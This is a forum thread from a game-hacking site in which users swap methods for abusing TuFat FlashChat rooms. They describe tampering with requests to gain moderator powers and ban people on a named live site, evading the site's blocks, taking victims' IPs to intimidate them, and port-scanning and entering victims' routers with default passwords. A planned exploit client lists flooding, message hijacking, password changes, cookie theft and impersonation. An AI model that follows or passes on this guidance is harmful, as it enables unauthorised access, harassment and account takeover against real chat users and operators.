Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: hack a TuFat flash chat

Post by Sethioz »

out of topic and not discussing it here anymore, but guess u too lazy to read NEWS in chatbox and IMPORTANT topic (so you should do so now).

well yes i used tamper data. also webscarab and paros.
jimmyx02
Newbie..
Newbie..
Posts: 14
Joined: Tue Jun 23, 2009 11:26 pm

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by jimmyx02 »

i over abused this flash chat site ------------> http://www.ffy.com with tamper data and they blocked mozilla fire fox (i was baning ppl)
anyway to get around this?? u mentioned paros proxy but i find it difficult to use can u explain in details how to use it and make it run through
any brower?? .dh.
Last edited by jimmyx02 on Sat Jun 27, 2009 5:13 am, edited 1 time in total.
jimmyx02
Newbie..
Newbie..
Posts: 14
Joined: Tue Jun 23, 2009 11:26 pm

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by jimmyx02 »

ok...never mind i got it to work but wat if they ban me while im using paros proxy??? it seems the only way i can have mod
control is when i log in with the paros on my browser
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

they banned firefox ? if they are really so dumb that they banned browser, then you can download "user agent switcher" from firefox add-ons, this allows you to appear as using other browser (anything you want, even custom)

paros is not so hard to use once you know what you changing, i used the filter options, but i can't remember which one was the right, well you can test and see whcih option works. theres some header, data...or something.

you can also use proxocket. it is harder to use, but if you know how to compile it and the right part of code, then all you need is to compile the .dll with right filter and then drop it into your firefox folder and it does all the replacing you want.

i can't remember, but i think flashchat checked for the packet's checksum, so it means that proxocket doesn't work unless you make another filter to change checksum (it is the sum of the data you send, which is set by paros..etc tools, like tamper data says "change checksum to xxx" or something like that). so in proxocket you have to make the filter manually. it also messes up your writing..so you can only say known lenght words i think.
if im right about checksum, then proxocket is not good for banning ..etc, but it is good for ringing bell for example, where you can make a custom filter, so for example when you say "ring/ring" (or whtever you want), then it rings the bell.
jimmyx02
Newbie..
Newbie..
Posts: 14
Joined: Tue Jun 23, 2009 11:26 pm

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by jimmyx02 »

ok now i know how to use paros and tamper well...i used the user switch agent and now i can go in with firefox. yea they are total idiots to be baning a browser looool
thx for ur help anyway...this tamper data hole can be fixed with one code haha
crakrboy
Newbie..
Newbie..
Posts: 1
Joined: Wed Jun 24, 2009 11:07 pm

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by crakrboy »

jimmyx02 wrote:ok now i know how to use paros and tamper well...i used the user switch agent and now i can go in with firefox. yea they are total idiots to be baning a browser looool
thx for ur help anyway...this tamper data hole can be fixed with one code haha
dude i had same problem as you did paros did the job? you must be some genious to get them to ban firefox ...you said it could be fixed with one code is that true?
jimmyx02
Newbie..
Newbie..
Posts: 14
Joined: Tue Jun 23, 2009 11:26 pm

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by jimmyx02 »

haha no i aint no genious they just too stupid...yea i keep an eye on the makers of the chat system and they came up with an update that will fix it with one code....this is a good place to keep an eye on wat the creators are doing http://forum.tufat.com/
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

what did they fix exactly ?
btw you can also do "/whois" command using the admin privileges exploit to see somebody's IP, if they so stupid that they ban firefox, then you can scare the shit out of them by telling them their own ip and saying that you gonna hack them. usually it works so well.

also long time ago when i first started hacking tufat flashchat, they had newer version, but it did not work. well it worked, but you was unable to change any settings at all. as soon as you changed something (like time settings..etc), then the chat did not load.
jimmyx02
Newbie..
Newbie..
Posts: 14
Joined: Tue Jun 23, 2009 11:26 pm

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by jimmyx02 »

yea i no /profile works too instead of /whois to show ip i tryed that they aint that scared of it lool....these guys have tryed everything to block me including blocking firefox and blocking proxys from entering their site...but once they realized i got through after they blocked proxys they unblocked it.
Last edited by jimmyx02 on Sat Jun 27, 2009 5:12 am, edited 1 time in total.
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

as about proxys, you can easily use TOR and then read TOR / Vidalia - how to use specific server/s as exit node. theres thousands of proxy servers and you can set any country as exit node, then you can use paros, webscarab and even burp suite i think to double route. so first your fox connects to your proxy and then proxy connects to TOR.

this is still flashchat topic, but if you get somebody's IP, you can scan it for open ports, lot of ppl have their NetBIOS ports open which allows you to basically get full control over pc or you can get access to their router and ban them from their own router or something (lot of ppl have default admin user and name in their router).

kula: why exactly that site name is not right ?
if somebody keeps messing with your chatroom, then there is a good reason for that (usually is). I first started working on flashchat when i got booted and banned from one chat i used to go, because one stupid girl started to blame me and everybody belived her not me, soo i took steps.
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

i only removed it to protect the member not the chatroom.
this is going totally offtopic, do not post such things here, it is still flashchat exploits topic.
jimmyx02
Newbie..
Newbie..
Posts: 14
Joined: Tue Jun 23, 2009 11:26 pm

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by jimmyx02 »

ok ill run some tests on the router ban trick ill get back to u if anything....as for king or wat ever ur name is why not ask me to remove the site link, im the one that posted it lool...site link stays on!!! i will add another later
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

router ban trick ?
as i mentioned, tools like burp suite, webscarab ..etc allows double proxying (or how to call it). firefox > webscarab > proxy

further offtopic posts will be deleted from this topic
dark_lord_tnt
Allie
Allie
Posts: 45
Joined: Sat Jul 04, 2009 5:51 pm

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by dark_lord_tnt »

I need a few Beta Testers as well as Contributors to a continutation of luigi's Flashchatz.. The project involves an upgrade based on the original concept. It will basically be a windows appilication that will exploit all of tufats flaws. The souce is closed but will be given to all contributing coders who are testers.. Testers are required to test the app in all situations as well as test any upgrades made to it, provide feedback to coders so that it can reach it full potential.. its in VB .NET 2005. Currently There are no member to this project besides me. I also require someone to host and distribute the app. Future projects as well. If intrested please contact me.
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

so you planning to implant all the exploits ive found into it ? for example you can choose "ban" and then user and hit "go" or "do it" or whatever and it bans the person from chat ?
im not directly interested in it anymore, but you can add me to msn (i will pm you on site, not here, cuz forum's pm does not work) and i can test and help whenever im up for it, but no promises.
dark_lord_tnt
Allie
Allie
Posts: 45
Joined: Sat Jul 04, 2009 5:51 pm

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by dark_lord_tnt »

Yeah basically everything the Admins can do and a lot more.. Think of it as a windows chat client.
1.) connects a user account
2.) retrives all info, incluing users, ids, rooms, and main chat log (yeah it even brings up the log)
3.) send message to main , or to a user
4.) get user id,
5.) send urgent message

The above is already implemented and works!!!

Yet to implement (proof of concept and trial works for these)
6.) Inject Image in main chat (proof of concept works)
7.) Inject Image in Invite (proof of concept works)
8.) Mass Unignore bombs single or multiple user (proof of concept works and better than i thought alomst like a DDOS attack)
9.) Mass Invite attack on single or multiple user (with Option image injection) .... works just like the above
10.) Kick User
11.) Kick Room
12.) Ban User
13.) Ban Ip
14.) Unban User / ip
15.) Room alert / chat alert
16.) Move User to any room
17.) Gag
18.) Room empty& flood

These work in theory
19. accept pm messages
20.) hijack pm messages
21.) Hijack user message and change contents
22.) Hijack user profile and customize it
23). Customize your own profie with exploit
24.) get user email / chnage password ..

e.g exploited profile...

http://chat.smstt.com/profile.php?user=18663
User avatar
Sethioz
Admin
Admin
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz
Location: unknown
Contact:

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

few ideas:

1. Retrieve all users IPs (proof of concept works) and save into a file maybe. (works with my admin privilege exploit and /whois)
2. Steal user's cookie - in theory it should work if you know how to write a cookie stealer and implant it into an message or smile.
i think it is something like your hijack user profile, or is it ? or is it the user id ?
3. talk under other names
a standalone feature, which will allow you to choose a victim from list and talk under that name (with autoupdate which sees who enteres room). this can be done either by stealing the ID or cookie. i sucessfully talked under other name, but i can't remember what i used, id or whole cookie.
Post Reply